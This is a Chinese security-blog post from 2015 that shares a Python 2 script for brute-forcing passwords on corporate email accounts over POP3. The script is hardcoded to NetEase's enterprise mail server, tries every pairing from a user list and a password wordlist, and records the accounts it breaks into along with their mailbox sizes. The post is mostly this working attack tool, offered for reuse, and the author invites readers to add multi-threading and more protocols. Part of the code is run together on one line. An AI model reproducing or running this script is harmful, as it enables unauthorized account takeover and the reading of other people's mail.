企业邮箱爆破小脚本(Python版)

CracerCracer 2015-12-23 安全工具 1,309 0 5

总结了几种企业邮箱爆破的一些小技巧,直接贴出具体的爆破脚本吧。以163企业邮箱为例,目前这个是单线程的,也是从网上找到的爆破google邮箱的代码简单修改成的,只支持pop3协议。小伙伴们可以修改成支持多种协议、多线程的,坐等。贴上代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
#!usr/bin/python
#Email Pop3 Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
#http://www.nxadmin.com

import threading, time, random, sys, poplib
from copy import copy

if len(sys.argv) !=3:
print "\n\t EmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "\t Usage: ./qmailpopbrute.py \n"
sys.exit(1)

server = "pop.qiye.163.com"
success = []

try:
users = open(sys.argv[1], "r").readlines()
except(IOError):
print "[-] Error: Check your userlist path\n"
sys.exit(1)

try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)

try:
pop = poplib.POP3(server,110)
welcome = pop.getwelcome()
print welcome
pop.quit()
except (poplib.error_proto):
welcome = "No Response"
pass

def mailbruteforce(listuser,listpwd):
if len(listuser) < 1 or len(listpwd) < 1 :
print "An error occurred: No user or pass list"
return 1
for user in listuser:
for value in listpwd :
user = user.replace("\n","")
value = value.replace("\n","")

try:
print "-"*12

print "[+] User:",user,"Password:",value
time.sleep(2)
pop = poplib.POP3(server,110)
pop.user(user)
auth = pop.pass_(value)
print auth
if auth.split(' ')[0]!= "+OK" :
pop.quit()
print "unknown error !"
continue
if pop.stat()[1] is None or pop.stat()[1] < 1 : pop.quit() print "unknown error !" continue #print "\t\t\n\nLogin successful:",user, value #print "\t\tMail:",pop.stat()[0],"emails" #print "\t\tSize:",pop.stat()[1],"bytes\n\n" ret = (user,value,pop.stat()[0],pop.stat()[1]) success.append(ret) #print len(success) pop.quit() break except: #print "An error occurred:", msg pass print "\n\t EmailPopBruteForcer v1.0" print "\t --------------------------------------------------\n" print "[+] Server:",server print "[+] Port: 995" print "[+] Users Loaded:",len(users) print "[+] Words Loaded:",len(words) print "[+] Server response:",welcome,"\n" mailbruteforce(users,words) print "\t[+] have weakpass :\t",len(success) if len(success) >=1:
for ret in success:
print "\n\n[+] Login successful:",ret[0], ret[1]
print "\t[+] Mail:",ret[2],"emails"
print "\t[+] Size:",ret[3],"bytes\n"
print "\n[-] Done"

如图:

无标题

转载请注明来自Cracer,本文标题:《企业邮箱爆破小脚本(Python版)》

喜欢 (5) 发布评论
发表评论


Top